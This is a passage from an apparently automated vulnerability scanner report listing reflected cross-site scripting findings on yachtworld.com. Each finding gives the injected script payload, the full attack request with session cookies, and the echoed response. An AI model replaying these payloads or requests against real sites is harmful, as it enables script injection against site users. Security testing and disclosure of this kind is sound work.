Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; 
savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid
%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 21:00:03 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewater5ada6--><script>alert(1)</script>b8852678aaf/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewater5ada6-->
...[SNIP]...

3.87. http://www.yachtworld.com/bluewater/bluewater_1.cgi [hosturl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /bluewater/bluewater_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload c9ea6<script>alert(1)</script>74d178365e9 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bluewater/bluewater_1.cgi?company=bluewater&limit=50&type=&new=&units=Feet&hosturl=bluewaterc9ea6<script>alert(1)</script>74d178365e9&page=broker HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp?slim=pp221796&currency=USD&units=Feet&currencyid=100&ps=100&slim=pp221796&uom=126&sm=3&duom=126&is=false&incnt=51447&wuom=126&currencyid=100&luom=126&so=0&ps=100&n=1:8:4:380:51447&searchPage=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; 
savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.23.10.1296155835; s_pers=%20s_nr%3D1296157077414%7C1298749077414%3B%20s_lv%3D1296157077416%7C1390765077416%3B%20s_lv_s%3DFirst%2520Visit%7C1296158877416%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp%2525253Fslim%2525253Dpp221796%25252526currency%2525253DUSD%25252526units%2525253DFeet%25252526currencyid%2525253D100%25252526ps%2525253D100%25252526slim%2525253Dpp221796%25252526uom%2525253D126%25252526sm%2525253D3%25252526duom%2525253D126%25252526is%2525253Dfalse%25252526incnt%2525253D51447%25252526wuom%2525253D126%25252526currencyid
%2525253D100%25252526luom%2525253D126%25252526so%2525253D0%25252526ps%2525253D100%25252526n%2525253D1%2525253A8%2525253A4%2525253A380%2525253A51447%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/bluewater/bluewater_1.cgi%2525253Fcompany%2525253Dbluewater%25252526limit%2525253D50%25252526type%2525253D%25252526new%2525253D%25252526units%2525253DFeet%252526ot%25253DA%3B

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:59:56 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 62732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewaterc9ea6<scri
...[SNIP]...
</script>74d178365e9/boats.footer.html:--> Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewaterc9ea6<script>alert(1)</script>74d178365e9/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/bluewaterc9ea6<script>
...[SNIP]...

3.88. http://www.yachtworld.com/bluewater/email.cgi [office_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /bluewater/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 925d7"><script>alert(1)</script>61a123d4d1a was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bluewater/email.cgi?url=bluewater&office_id=7582925d7"><script>alert(1)</script>61a123d4d1a&boat_id=2061801&hosturl=bluewater&&ywo=bluewater&&includeNav=true HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:59:47 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!-- this file is generated automatically -->
<!-- any changes you make will be written over -->
<html>
<head>
<TITLE>Bluewater Yacht Sales (Hampton, VA)</TITLE>
<META name="keywords" content
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="7582925d7"><script>alert(1)</script>61a123d4d1a">
...[SNIP]...

3.89. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b36c4"><script>alert(1)</script>0acf81a8360 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-1930392/Toms-Riverb36c4"><script>alert(1)</script>0acf81a8360/NJ/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:51 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator